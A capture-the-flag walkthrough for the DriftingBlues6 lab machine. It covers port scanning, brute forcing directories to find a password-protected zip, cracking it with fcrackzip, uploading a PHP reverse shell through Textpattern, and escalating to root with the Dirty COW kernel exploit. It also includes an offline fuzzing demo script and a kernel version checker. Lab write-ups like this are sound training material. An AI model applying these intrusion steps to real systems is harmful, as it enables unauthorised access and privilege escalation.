sec👨‍💻fortress:~#

Defensive By Offensive!


Driftingblues6



Difficulty = Easy


As usual we start with a network discovery scan, which finds the target at 192.168.0.115.

A full-range nmap scan shows only one open port:

# Nmap 7.94 scan initiated Fri Nov 17 03:02:13 2023 as: nmap -p- -sVC -v --min-rate=1000 -T4 -oN nmap.txt 192.168.0.115
Nmap scan report for driftingblues (192.168.0.115)
Host is up (0.00028s latency).
Not shown: 65534 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.2.22 ((Debian))
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-title: driftingblues
| http-robots.txt: 1 disallowed entry 
|_/textpattern/textpattern
|_http-server-header: Apache/2.2.22 (Debian)

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Nov 17 03:02:27 2023 -- 1 IP address (1 host up) scanned in 13.82 seconds

Checking out port 80/HTTP, we get a plain website with nothing interesting on it 🤪

Checking /robots.txt, just as nmap reported, gives us a single disallowed entry: /textpattern/textpattern

Navigating to /textpattern/textpattern brings up the Textpattern login page.

Next I ran a directory brute force with ffuf, adding the .zip extension, which turned up spammer.zip in the web root.

We can then download the zip file directly with the command below:

$ wget 192.168.0.115/spammer.zip
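The brute force above is the key step, so here is an added example (mine, not code from the original writeup) of what ffuf is doing with `-e .zip`: every wordlist entry is requested both bare and with the extension, and anything that is not a 404 is reported. An actual ffuf invocation along those lines would be something like `ffuf -u http://192.168.0.115/FUZZ -w /usr/share/wordlists/dirb/common.txt -e .zip` (the wordlist path is an assumption; the page does not show the command). So that it runs offline, the script below fuzzes a throwaway local `http.server` whose webroot, wordlist and file names are constructed for the demo.

```python
"""Added example, not from the original writeup: a tiny ffuf-style brute-forcer
that tries every wordlist entry with and without a .zip extension and reports
anything that is not a 404. It runs against a throwaway local http.server with
a constructed webroot, so it works offline; the wordlist, hostnames and file
names are all made up for the demo."""
import functools
import http.server
import os
import shutil
import tempfile
import threading
import urllib.error
import urllib.request


class _NoRedirect(urllib.request.HTTPRedirectHandler):
    """Report 301/302 as hits instead of silently following them (ffuf does the same)."""
    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None


_opener = urllib.request.build_opener(_NoRedirect)


def probe(base_url, words, extensions=("", ".zip"), timeout=3):
    """HEAD base_url/<word><ext> for every combination; return [(path, status)] for non-404s."""
    hits = []
    for word in words:
        for ext in extensions:
            path = "/" + word + ext
            req = urllib.request.Request(base_url + path, method="HEAD")
            try:
                with _opener.open(req, timeout=timeout) as resp:
                    hits.append((path, resp.status))
            except urllib.error.HTTPError as err:
                if err.code != 404:          # 301/401/403 still tell us something exists
                    hits.append((path, err.code))
            except urllib.error.URLError:
                pass                         # connection problem: skip, do not report
    return hits


class _QuietHandler(http.server.SimpleHTTPRequestHandler):
    def log_message(self, *args):            # keep the demo output clean
        pass


def serve_constructed_webroot():
    """Start a local server with a constructed webroot; return (base_url, server, root)."""
    root = tempfile.mkdtemp()
    os.mkdir(os.path.join(root, "textpattern"))                  # a directory, like the real box
    with open(os.path.join(root, "spammer.zip"), "wb") as fh:    # the "forgotten" archive
        fh.write(b"PK\x05\x06" + b"\x00" * 18)                   # smallest valid (empty) zip
    handler = functools.partial(_QuietHandler, directory=root)
    server = http.server.ThreadingHTTPServer(("127.0.0.1", 0), handler)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return "http://127.0.0.1:%d" % server.server_address[1], server, root


def demo():
    """Fuzz the constructed webroot with a constructed wordlist; return sorted hits."""
    base_url, server, root = serve_constructed_webroot()
    try:
        wordlist = ["admin", "backup", "images", "spammer", "textpattern"]
        return sorted(probe(base_url, wordlist))
    finally:
        server.shutdown()
        server.server_close()
        shutil.rmtree(root, ignore_errors=True)


if __name__ == "__main__":
    for path, status in demo():
        print(status, path)
```

The redirect handler is the detail worth keeping: a directory without a trailing slash answers 301, and if the client follows it you lose the signal that `/textpattern` exists as a directory. Filtering only on 404 is the same default trade-off ffuf makes; on a real target you would then add filters for size or word count to drop the "soft 404" pages.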

When we try to unzip the file, we are asked for a password

With fcrackzip we can brute force the archive password against rockyou.txt:

$ sudo apt install fcrackzip
$ fcrackzip -v -u -D -p /usr/share/wordlists/rockyou.txt spammer.zip

Unzipping the archive with the recovered password gives us creds.txt.

With those credentials we can log in to the Textpattern login page found earlier.

Under the Content tab, the Files section lets us upload a PHP web shell.

The shell, named good.php, ends up under /textpattern/files; a reverse shell payload can be generated at www.revshells.com. Start your listener first, then request the uploaded file to trigger it.

Hell yeah, we get a reverse shell as www-data (hint: use the Python payload for a stable shell).

Enumerating the box (other users besides www-data, passwords in config files, SUID binaries) turns up nothing, but uname -a tells us which kernel we are running on:

Unfortunately for the box, this kernel version is vulnerable to Dirty COW (CVE-2016-5195), the copy-on-write race condition privilege escalation, which is exactly what we need 😁

Copy the exploit code into a file named cowroot.c and save it on the box. Keep in mind that race-condition exploits like this can leave the kernel unstable, so expect to reboot if it hangs, and only run it on a lab machine.
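Before reaching for the exploit it is worth a quick sanity check that the version string is actually in range. The script below is an added example (mine, not part of the original writeup): it parses a `uname -r` string and compares it against the three upstream stable releases named in the Dirty COW advisory. It only knows upstream numbers; Debian and other distros backport the fix without bumping the version, so for any older longterm kernel the answer is "check-distro-patch", meaning read the package changelog or test, rather than trusting the number. The sample release strings in the test are constructed, not the one from this box.

```python
"""Added example, not from the original writeup: classify a `uname -r` release
string against the upstream Dirty COW (CVE-2016-5195) fixes. Distro kernels
backport fixes without changing the version, so "check-distro-patch" means the
version alone cannot answer the question."""
import re
import subprocess
import sys

# Upstream stable releases that shipped the fix (October 2016), per the advisory.
FIXED_IN = {(4, 8): (4, 8, 3), (4, 7): (4, 7, 9), (4, 4): (4, 4, 26)}
FIRST_AFFECTED = (2, 6, 22)  # the race was introduced in 2.6.22 (2007)


def parse_release(release: str) -> tuple:
    """'3.2.0-4-amd64' -> (3, 2, 0): keep the numeric prefix, drop distro suffixes."""
    m = re.match(r"(\d+)\.(\d+)(?:\.(\d+))?", release.strip())
    if not m:
        raise ValueError("not a kernel release string: %r" % release)
    return tuple(int(part or 0) for part in m.groups())


def dirtycow_status(release: str) -> str:
    """Return one of: not-affected, vulnerable-upstream, fixed, check-distro-patch."""
    v = parse_release(release)
    if v < FIRST_AFFECTED:
        return "not-affected"
    fixed = FIXED_IN.get(v[:2])
    if fixed is not None:                  # a series with a known upstream fix
        return "vulnerable-upstream" if v < fixed else "fixed"
    if v >= (4, 9, 0):                     # every later series already includes the fix
        return "fixed"
    return "check-distro-patch"            # older longterm/distro kernel: version alone can't tell


if __name__ == "__main__":
    # Usage: python3 cowcheck.py [release]; defaults to the running kernel.
    rel = sys.argv[1] if len(sys.argv) > 1 else subprocess.check_output(["uname", "-r"], text=True)
    print(rel.strip(), "->", dirtycow_status(rel))
```

On a CTF box "check-distro-patch" is usually good news, since the old image almost never has the backport; on a real engagement it is the signal to confirm with `dpkg -s linux-image-$(uname -r)` or a harmless proof-of-concept before running anything that races the kernel.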

Compile the code using GCC with the following command

$ gcc cowroot.c -o cowroot -pthread

Now run it with ./cowroot and you should be root.

GG 👾